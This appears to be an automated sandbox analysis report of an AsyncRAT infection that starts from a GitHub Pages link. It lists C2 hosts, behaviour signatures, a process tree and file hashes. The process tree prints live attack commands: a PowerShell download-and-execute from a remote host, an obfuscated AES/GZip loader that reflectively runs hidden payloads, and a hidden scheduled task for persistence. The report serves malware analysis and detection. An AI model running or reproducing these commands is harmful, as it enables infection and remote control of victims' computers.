Analysis

  • max time kernel
    595s
  • max time network
    597s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 16:55

General

  • Target

    http://lplamemm.github.io/kldmcjj/kathylshjssksksop.html

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

vossaqua.de:4258

vossaqua.de:3984

vossaqua.de:4377

vossaqua.de:8596

vossaqua.de:2302

Mutex

Pmjytw7Jm

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://lplamemm.github.io/kldmcjj/kathylshjssksksop.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe16a46f8,0x7fffe16a4708,0x7fffe16a4718
      2⤵
        PID:2424
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        2⤵
          PID:3532
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3704
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
          2⤵
            PID:4212
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
            2⤵
              PID:2192
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
              2⤵
                PID:3840
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
                2⤵
                  PID:540
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
                  2⤵
                    PID:3156
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                    2⤵
                      PID:3736
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
                      2⤵
                        PID:4292
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:908
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
                        2⤵
                          PID:4396
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
                          2⤵
                            PID:4700
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
                            2⤵
                              PID:708
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
                              2⤵
                                PID:4136
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                                2⤵
                                  PID:5056
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
                                  2⤵
                                    PID:1848
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5736 /prefetch:8
                                    2⤵
                                      PID:2720
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6976 /prefetch:2
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5792
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7148 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:680
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                      2⤵
                                        PID:1560
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                        2⤵
                                          PID:5404
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,123480466943208742,7811122101821871508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
                                          2⤵
                                            PID:1516
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:1272
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:3604
                                            • C:\Windows\System32\rundll32.exe
                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                              1⤵
                                                PID:5336
                                              • C:\Users\Admin\Downloads\file2023K\Return Organizer.exe
                                                "C:\Users\Admin\Downloads\file2023K\Return Organizer.exe"
                                                1⤵
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:4076
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2928
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\8922_output.vbs"' & exit
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5628
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\8922_output.vbs"'
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies registry class
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1016
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8922_output.vbs"
                                                        5⤵
                                                        • Checks computer location settings
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5504
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
                                                          6⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5492
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:512
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
                                                          6⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3608
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8qTOlAdktxHtGcRhyi9GJLWd0b3GJoUvQ2Rb8p/8wew='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Db66vGSmysQ4H7sLYdcreQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $elTyk=New-Object System.IO.MemoryStream(,$param_var); $VQBSN=New-Object System.IO.MemoryStream; $yfMCA=New-Object System.IO.Compression.GZipStream($elTyk, [IO.Compression.CompressionMode]::Decompress); $yfMCA.CopyTo($VQBSN); $yfMCA.Dispose(); $elTyk.Dispose(); $VQBSN.Dispose(); $VQBSN.ToArray();}function execute_function($param_var,$param2_var){ $yClVVGQCBAbFBKZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vdyDTsdASqrHEapWMzVXrRnuLoIsXjqpQSruGjIhubsFEYlClEpfFNIDPeSFJLDJZbRLIVqCQNCpzIPMcggtUlKdkOEBrdyJyIFChATqnMoRksehpfCDEjPOrNBUqOlNpTQQcnFCmQghWSSRJxmmAU=$yClVVGQCBAbFBKZ.EntryPoint; $vdyDTsdASqrHEapWMzVXrRnuLoIsXjqpQSruGjIhubsFEYlClEpfFNIDPeSFJLDJZbRLIVqCQNCpzIPMcggtUlKdkOEBrdyJyIFChATqnMoRksehpfCDEjPOrNBUqOlNpTQQcnFCmQghWSSRJxmmAU.Invoke($null, $param2_var);}$AH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $AH;$WgUymOUYDX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AH).Split([Environment]::NewLine);foreach ($dl in $WgUymOUYDX) { if ($dl.StartsWith('::')) { $Z=$dl.Substring(2); break; }}$payloads_var=[string[]]$Z.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies registry class
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5960
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr82_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_82.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                              8⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5860
                                                            • C:\Windows\SysWOW64\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_82.vbs"
                                                              8⤵
                                                              • Checks computer location settings
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6136
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_82.bat" "
                                                                9⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5192
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8qTOlAdktxHtGcRhyi9GJLWd0b3GJoUvQ2Rb8p/8wew='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Db66vGSmysQ4H7sLYdcreQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $elTyk=New-Object System.IO.MemoryStream(,$param_var); $VQBSN=New-Object System.IO.MemoryStream; $yfMCA=New-Object System.IO.Compression.GZipStream($elTyk, [IO.Compression.CompressionMode]::Decompress); $yfMCA.CopyTo($VQBSN); $yfMCA.Dispose(); $elTyk.Dispose(); $VQBSN.Dispose(); $VQBSN.ToArray();}function execute_function($param_var,$param2_var){ $yClVVGQCBAbFBKZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vdyDTsdASqrHEapWMzVXrRnuLoIsXjqpQSruGjIhubsFEYlClEpfFNIDPeSFJLDJZbRLIVqCQNCpzIPMcggtUlKdkOEBrdyJyIFChATqnMoRksehpfCDEjPOrNBUqOlNpTQQcnFCmQghWSSRJxmmAU=$yClVVGQCBAbFBKZ.EntryPoint; $vdyDTsdASqrHEapWMzVXrRnuLoIsXjqpQSruGjIhubsFEYlClEpfFNIDPeSFJLDJZbRLIVqCQNCpzIPMcggtUlKdkOEBrdyJyIFChATqnMoRksehpfCDEjPOrNBUqOlNpTQQcnFCmQghWSSRJxmmAU.Invoke($null, $param2_var);}$AH = 'C:\Users\Admin\AppData\Roaming\inicia_str_82.bat';$host.UI.RawUI.WindowTitle = $AH;$WgUymOUYDX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AH).Split([Environment]::NewLine);foreach ($dl in $WgUymOUYDX) { if ($dl.StartsWith('::')) { $Z=$dl.Substring(2); break; }}$payloads_var=[string[]]$Z.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                  10⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3832

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                Filesize

                                                1KB

                                                MD5

                                                def65711d78669d7f8e69313be4acf2e

                                                SHA1

                                                6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                SHA256

                                                aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                SHA512

                                                05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                b8880802fc2bb880a7a869faa01315b0

                                                SHA1

                                                51d1a3fa2c272f094515675d82150bfce08ee8d3

                                                SHA256

                                                467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                                SHA512

                                                e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                Filesize

                                                152B

                                                MD5

                                                ba6ef346187b40694d493da98d5da979

                                                SHA1

                                                643c15bec043f8673943885199bb06cd1652ee37

                                                SHA256

                                                d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                                SHA512

                                                2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2ad854a8-afd3-483f-b604-4c63b0e95e25.tmp

                                                Filesize

                                                5KB

                                                MD5

                                                57f112f4aab2aa6f2742955606d2376c

                                                SHA1

                                                541bbe7e7bfb32454f24a87b28c13a4a8a24763b

                                                SHA256

                                                4a22b88c443f8eeecf88c9dca37b07a8f9673ca90d2e41a89d28b1ee0f9b96a3

                                                SHA512

                                                702856297fcbd8ee6aef8c31efc40e660a7961a6fbaaf840d10a30d6d97e99cca349e065a6415d9efda63bdf0a89e1a4db7cd50b6f566f0ac5eee2000ef69de7

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                Filesize

                                                120B

                                                MD5

                                                50d93532a8c9748e62dd8dadb7899b4c

                                                SHA1

                                                a7a1923afcfb32cc0900c18ffbf289808a34881e

                                                SHA256

                                                a0ef4022ab1824b97549d07286ea8cc123bc50876b05f4135d384e8a69afb033

                                                SHA512

                                                364c90fe8469dc3e820db5a1e47a8239e65b5e90ec919497814d9810945f1522eed34d4aacba406e5b0362bf1b122295c1657c289667c9cbe1dff1ee051ffd22

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                Filesize

                                                96B

                                                MD5

                                                2274f32d802c46942b09d0bf9d582a1a

                                                SHA1

                                                3298c579d4b28513a9a92d56f3948ce9394f99e5

                                                SHA256

                                                27a4b6b14536ce88216daf31c2183e92f6bcaf3746b8f20e9ef0be462a89684d

                                                SHA512

                                                7805f0f17b643ac08b8f0803a99e25b9db59611ffab70427993b0e628dc858a3240709ce735206fd9b903ffa1e831d69634495650f1049d7cae4e92b7069a41f

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                Filesize

                                                168B

                                                MD5

                                                21e529a50b9b77bd60577fee05debfd7

                                                SHA1

                                                25a9e950f8bead8bfe4c3788bd6621b0300275a3

                                                SHA256

                                                eae4ebae90fb0ff8c035ad108d11b207e1427d9ab2b34f4a59bc0373a5d3e642

                                                SHA512

                                                4f9f83b361fd015c4efe9ee1242fb15d0049060a11664dae859d1e34fb04f996074f1c8093709eee0a19f2ba695f41d8f5f6c740ab4c024d8740ac938184dec8

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                Filesize

                                                144B

                                                MD5

                                                945c56157932f2261075d0f9deba3ef8

                                                SHA1

                                                32fbc2ea7351f445183324c805662e3a41e153a4

                                                SHA256

                                                fff1fc2ea9c4cb7553881b78cbc4064bf17f83befccce0d4b2839cda865f7daf

                                                SHA512

                                                87f23edde3f68350ef578ab16ed7f46689cab08cfc703029a20d8f2b02e2c0f88bc9138c0b06bf3ee824c905a171d3ec1b2b4d84c04fadb974f03a7312a4629e

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                Filesize

                                                340B

                                                MD5

                                                a8b3c915c1d7046fd25a56e84a283f22

                                                SHA1

                                                9699a1ae15101b2d40f2014a2bbc91f4f8d4b5ef

                                                SHA256

                                                2d61149947160b38ccd2c201e71d5aa143e886c4507f6b7a1d0bac9c2e711bc7

